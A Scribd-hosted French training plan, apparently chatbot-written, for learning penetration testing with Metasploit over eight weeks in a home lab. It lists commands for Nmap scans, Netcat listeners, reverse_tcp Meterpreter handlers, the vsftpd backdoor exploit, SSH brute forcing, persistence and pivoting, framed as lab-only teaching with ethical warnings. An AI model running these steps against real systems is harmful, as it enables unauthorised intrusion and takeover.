0% ont trouvé ce document utile (0 vote)
3 vues7 pages

Programme Détallé Metaexploit

Ce document présente un programme de formation de 8 semaines pour débutants en pentesting, comprenant des sessions pratiques sur l'installation d'outils, l'exploitation de vulnérabilités, et l'automatisation des tâches. Chaque semaine est structurée autour d'objectifs spécifiques, avec des exercices pratiques et des ressources d'apprentissage recommandées. Des avertissements éthiques soulignent l'importance de respecter la légalité et la sécurité lors des tests.

Transféré par

Mamadou BANGOURA
Copyright
© All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats DOCX, PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
3 vues7 pages

Programme Détallé Metaexploit

Ce document présente un programme de formation de 8 semaines pour débutants en pentesting, comprenant des sessions pratiques sur l'installation d'outils, l'exploitation de vulnérabilités, et l'automatisation des tâches. Chaque semaine est structurée autour d'objectifs spécifiques, avec des exercices pratiques et des ressources d'apprentissage recommandées. Des avertissements éthiques soulignent l'importance de respecter la légalité et la sécurité lors des tests.

Transféré par

Mamadou BANGOURA
Copyright
© All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats DOCX, PDF, TXT ou lisez en ligne sur Scribd

Parfait — voici le programme détaillé jour-par-jour pour 8 semaines (3

sessions/semaine × ~2 heures par session). Il est conçu pour un débutant


sérieux : installations, commandes utiles, labs pratiques et projets.
Respecte toujours la loi — ne teste que sur des machines que tu
possèdes ou des plateformes autorisées (TryHackMe, Hack The Box,
machines locales).

Plan global

 Durée : 8 semaines, 3 sessions/semaine (ex. Lundi / Mercredi /


Vendredi).

 Durée par session : 1.5–3 heures (idéal ≈ 2 h).

 Matériel requis : PC avec VirtualBox/VMware, images Kali Linux,


Metasploitable / DVWA / OWASP Juice Shop, connexion internet.

 Résultat attendu : tu seras capable d’installer Metasploit, effectuer


reconnaissance, exploiter des cibles en lab, faire post-exploitation
basique et automatiser des tâches.

Semaine 1 — Installation & bases

Objectif : monter l’environnement de travail et comprendre le workflow


pentest.

Session 1 (Lundi) — Installation des VMs (2 h)

 Installer VirtualBox ou VMware.

 Télécharger + importer Kali Linux (VM).

 Télécharger Metasploitable2 (VM vulnérable) ou utiliser une


machine VulnHub.

 Démarrer Kali → mettre à jour :

o sudo apt update && sudo apt upgrade -y

 Vérifier msfconsole : msfconsole --version (Metasploit est préinstallé


sur Kali).

Session 2 (Mercredi) — Concepts de pentest & réseau local (2 h)

 Comprendre les phases : recon → scan → exploitation → post.

 Configurer réseau VM en host-only ou NAT+port forward pour


isoler le lab.

 Trouver IPs : ip a (Kali), ifconfig ou ipconfig pour autres VMs.


 Exercice : ping entre Kali et Metasploitable.

Session 3 (Vendredi) — Outils de base (2 h)

 Apprendre Nmap : scans basiques

o nmap -sC -sV -oN [Link] <target-ip>

o nmap -p- <target-ip> (scan ports)

 Netcat : nc -lvnp 4444 (listener)

 Exercice : lancer un scan et interpréter résultats.

Semaine 2 — Découverte Metasploit & modules

Objectif : comprendre modules, recherche, options et exécution.

Session 4 (Lundi) — msfconsole basics (2 h)

 Lancer msfconsole. Commandes utiles :

o search vsftpd / search type:exploit platform:linux

o use exploit/unix/…

o show options, set RHOSTS <ip>, set RPORT <port>, exploit

 Exercice : chercher un module adapté au service découvert par


Nmap.

Session 5 (Mercredi) — Payloads & handlers (2 h)

 Comprendre payloads : set PAYLOAD


linux/x86/meterpreter/reverse_tcp

 Lancer handler : use exploit/multi/handler → set PAYLOAD ... → set


LHOST <kali-ip> → run

 Exercice : simuler un reverse shell local (écoute + exécution depuis


VM vulnérable contrôlée).

Session 6 (Vendredi) — Auxiliaires & scanners Metasploit (2 h)

 Modules auxiliaires : auxiliary/scanner/…

 Exemples : scanner SMB, HTTP, FTP via Metasploit.

 Exercice : lancer un scanner SMB et comparer avec Nmap.

Semaine 3 — Exploitation pratique (reflected/stored non web)


Objectif : exécuter une exploitation contrôlée sur Metasploitable.

Session 7 (Lundi) — Exécution d’un exploit simple (2 h)

 Identifier un service vulnérable (ex. vsftpd backdoor).

 search vsftpd → use exploit/unix/ftp/vsftpd_234_backdoor →


configurer RHOSTS/RPORT → exploit.

 Observer résultat (shell).

 Nettoyage : garder notes et fermer connexions.

Session 8 (Mercredi) — Meterpreter basics (2 h)

 Après obtention de Meterpreter : commandes utiles sysinfo, getuid,


ps, shell, upload, download.

 Exercice : lister processus et télécharger un fichier permissif.

Session 9 (Vendredi) — Persistence & nettoyage (2 h)

 Notions de persistence en lab (ex. persistence Meterpreter script) —


uniquement en lab.

 Apprendre à retourner la machine à l’état initial (snapshot VM avant


test).

Semaine 4 — Web security basics & XSS (contexte Metasploit web)

Objectif : apprendre bases du web hacking et liens avec Metasploit.

Session 10 (Lundi) — Introduction aux vulnérabilités web (2 h)

 Concepts : XSS, SQLi, CSRF, RCE.

 Installer DVWA / JuiceShop sur une VM (ou Docker) et configurer


sécurité basse.

 Exercice : trouver une page vulnérable XSS simple.

Session 11 (Mercredi) — Enchaîner reconnaissance web (2 h)

 Outils : dirb, gobuster (si installé) : gobuster dir -u [Link] -w


/usr/share/wordlists/dirb/[Link]

 Scanner vulnérabilités web depuis Metasploit (auxiliary/scanner/http/


modules).

 Exercice : lister directories sensibles.

Session 12 (Vendredi) — Exploits web avec Metasploit (2 h)


 Rechercher exploit PHP/CGI/WordPress dans Metasploit.

 Exemple : trouver module pour une vieille version de CMS (sur


machine lab).

 Exercice : exploiter une vulnérabilité web contrôlée (si lab contient


un exploit disponible).

Semaine 5 — Scanners, brute force & post-exploitation avancé

Objectif : élargir boîte à outils (bruteforce, pivoting de base).

Session 13 (Lundi) — Bruteforce & modules auxiliaires (2 h)

 Utiliser auxiliary/scanner/ssh/ssh_login pour tester credentials


(seulement en lab).

 Utiliser wordlists (/usr/share/wordlists/[Link]).

 Exercice : bruteforce sur account test (lab).

Session 14 (Mercredi) — Pivoting & tunneling (2 h)

 Concepts : pivoting, SOCKS proxy via Meterpreter (run autoroute,


use aux/server/socks4a), SSH tunneling.

 Exercice : depuis Kali, accéder à une VM interne via tunnel


Meterpreter (lab).

Session 15 (Vendredi) — Escalade de privilèges (2–3 h)

 Rechercher vecteurs locaux : services setuid, kernels vulnérables,


scripts cron.

 Outils : [Link], linux-exploit-suggester (en lab).

 Exercice : pratiquer une escalade sur une VM vulnérable préparée.

Semaine 6 — Automatisation & développement

Objectif : automatiser tâches et comprendre base de création de modules.

Session 16 (Lundi) — Resource scripts & automatisation (2 h)

 .rc files : exemple workspace -a lab\nuse


auxiliary/scanner/portscan/tcp\nset RHOSTS [Link]\nrun\nexit

 Exercice : écrire un .rc qui scanne puis tente un exploit connu.

Session 17 (Mercredi) — Introduction au dev (Ruby) & lire modules (2 h)


 Localiser les modules Metasploit sur Kali (ex. /usr/share/metasploit-
framework/modules/).

 Lire un module simple pour comprendre structure (options, exploit


method).

 Exercice : modifier un module de démonstration (en lab) pour


apprendre.

Session 18 (Vendredi) — Reporting & preuve (2 h)

 Rédiger un rapport basique : résumé, scope, méthodologie,


vulnérabilités, preuve (captures), remediation.

 Exercice : produire un rapport pour une attaque lab réalisée.

Semaine 7 — Labs structurés & plateformes en ligne

Objectif : consolider avec plateformes (TryHackMe / Hack The Box) et


challenges.

Session 19 (Lundi) — TryHackMe / HTB onboarding (2 h)

 Créer compte TryHackMe (ou HTB), parcourir rooms intro (Metasploit,


Web exploitation).

 Commencer une room Metasploit Intro.

 Exercice : résoudre 1–2 tasks.

Session 20 (Mercredi) — Capture The Flag (CTF) practice (2–3 h)

 Choisir une machine facile (TryHackMe “Starting Point” / HTB easy).

 Appliquer flow : reconnaissance → exploit → post → rapport.

 Exercice : capturer le flag utilisateur.

Session 21 (Vendredi) — Revue & consolidation (2 h)

 Refaire les labs où tu as eu des difficultés.

 Compléter le rapport final intermédiaire.

Semaine 8 — Projet final & bonnes pratiques

Objectif : synthèse — réaliser un test complet et documenté.

Session 22 (Lundi) — Préparation du projet final (2 h)


 Préparer lab : Kali, Metasploitable, DVWA/JuiceShop. Créer
snapshots.

 Définir scope (liste d’IP/machines test).

Session 23 (Mercredi) — Exécution du projet (3 h)

 Faire le pentest complet : reconnaissance (Nmap), vuln scanning,


exploitation (Metasploit + manuelle), post-exploitation (Meterpreter),
escalade.

 Noter toutes les commandes, captures d’écran et outputs.

Session 24 (Vendredi) — Rapport final & présentation (2–3 h)

 Rédiger rapport final : résumé exécutif, techniques, preuves,


remédiations, recommandations.

 Préparer une courte présentation (5–10 min) de ton travail (slide ou


doc).

 Sauvegarder/snapshots, nettoyer environnements.

Checklists & commandes utiles (raccourci)

 Metasploit : msfconsole, search, use, show options, set RHOSTS, set


LHOST, set PAYLOAD, exploit

 Nmap : nmap -sC -sV -p- -oN [Link] <ip>

 Netcat : nc -lvnp 4444 / nc -nv <ip> <port>

 Gobuster : gobuster dir -u [Link] -w


/usr/share/wordlists/dirb/[Link]

 Meterpreter : sysinfo, shell, ps, upload, download, getuid, run


post/multi/recon/local_exploit_suggester

 Snapshots : toujours créer un snapshot VM avant test risqué.

Ressources d’apprentissage (rapide)

 Kali Linux (VM) — pratique quotidienne.

 Metasploitable / DVWA / OWASP Juice Shop — environnements


vulnérables.

 TryHackMe / Hack The Box — rooms guidées et challenges.

 Docs Metasploit (Rapid7) et Metasploit Unleashed (texte).


Avertissements éthiques et sécurité

 N’attaque jamais des systèmes réels sans autorisation écrite.

 Toujours travailler en environnement isolé/contrôlé.

 Respecte la confidentialité et ne publie pas d’exploits contre des


systèmes en production.

Vous aimerez peut-être aussi